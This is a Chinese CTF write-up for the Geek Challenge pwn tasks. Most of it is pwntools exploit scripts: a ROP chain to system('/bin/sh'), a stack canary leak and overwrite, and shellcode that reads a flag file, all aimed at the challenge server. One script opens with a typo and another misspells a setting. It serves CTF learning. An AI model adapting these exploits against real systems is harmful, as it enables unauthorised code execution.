第十届极客大挑战pwn

Find tools

直接nc上去使用pwntool就可以看到base64字符串解密当作密码提即可

from pwn import *
import base64
p=remote('pwnto.fun',9999)
p.recvuntil('The key is :\n')
psd=p.recv(24)
psd=base64.b64decode(psd)
log.success('pas: '+psd)
p.send(psd)
p.interactive()

Baby rop

栈溢出覆盖返回地址到system参数’/bin/sh\x00’即可

from pwn import *
p=remote('pwnto.fun',10000)
elf=ELF('./hello')
offset=136
pop_rdi=0x0000400693 
payload='a'*offset+p64(pop_rdi)+p64(0x006010AE)+p64(elf.symbols['system'])
p.sendline(payload)
p.interactive()

babyshellcode

直接读flag文件好像还有非预期???

rom pwn import *
p=process('./RushB')
elf=ELF('./RushB')
def debug():
	gdb.attach(p)
context(os='linux',arch='amd64',log_level='debug')
print shellcraft.amd64.linux.sh()
shellcode='\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x66\x6c\x61\x67'
buf_addr=0x123000
pop_rdi=0x0400b53
p.recvuntil('have fun!')
p.send(shellcode)
p.recvuntil('CSGO?')
payload='a'*0x38+p64(buf_addr)
#debug()
p.sendline(payload)
p.interactive()

Baby canary

常规思路好像exp忘保存了~~不难的

Easy canary

from pwn import *
#p=process('./canary')
p=remote('pwnto.fun',10001)
elf=ELF('./canary')
def debug():
	gdb.attach(p)
p.recvuntil('Hava fun!')
payload='a'*20
p.sendline(payload)
p.recvuntil('aaaaaaaa\n')
canary=u32(p.recv(3).rjust(4,'\x00'))
log.success('canary: '+hex(canary))
p.recvuntil('try!')
payload='a'*20+p32(canary)+'a'*12+p32(0x08048647)
#debug()
p.sendline(payload)
p.interactive()

Not bad

也是直接读上面 的文件

from pwn import *
import pwnlib
context_arch='amd64'
#p=process('./bad')
p=remote('pwnto.fun',12301)
elf=ELF('./bad')
buf_addr=0x123000
jmp_rsp=0x00400a01
shellcode='''
push 0x67616c66
mov rdi,rsp 
push 2
pop rax
xor rsi,rsi
push 32
pop rdx
syscall
mov rdi,rax
mov rsi,rsp
xor rax,rax
syscall
push 1
pop rdi
push 1
pop rax
syscall
'''
shellcode=asm(shellcode,arch='amd64',os='linux')
log.success('sc_len: '+str(len(shellcode)))
payload=shellcode.ljust(40,'a')+p64(jmp_rsp)+asm('sub rsp,0x30;jmp rsp',arch='amd64',os='linux')
p.recvuntil('!')
#gdb.attach(p,'b *0x00400A49')
p.sendline(payload)
p.interactive()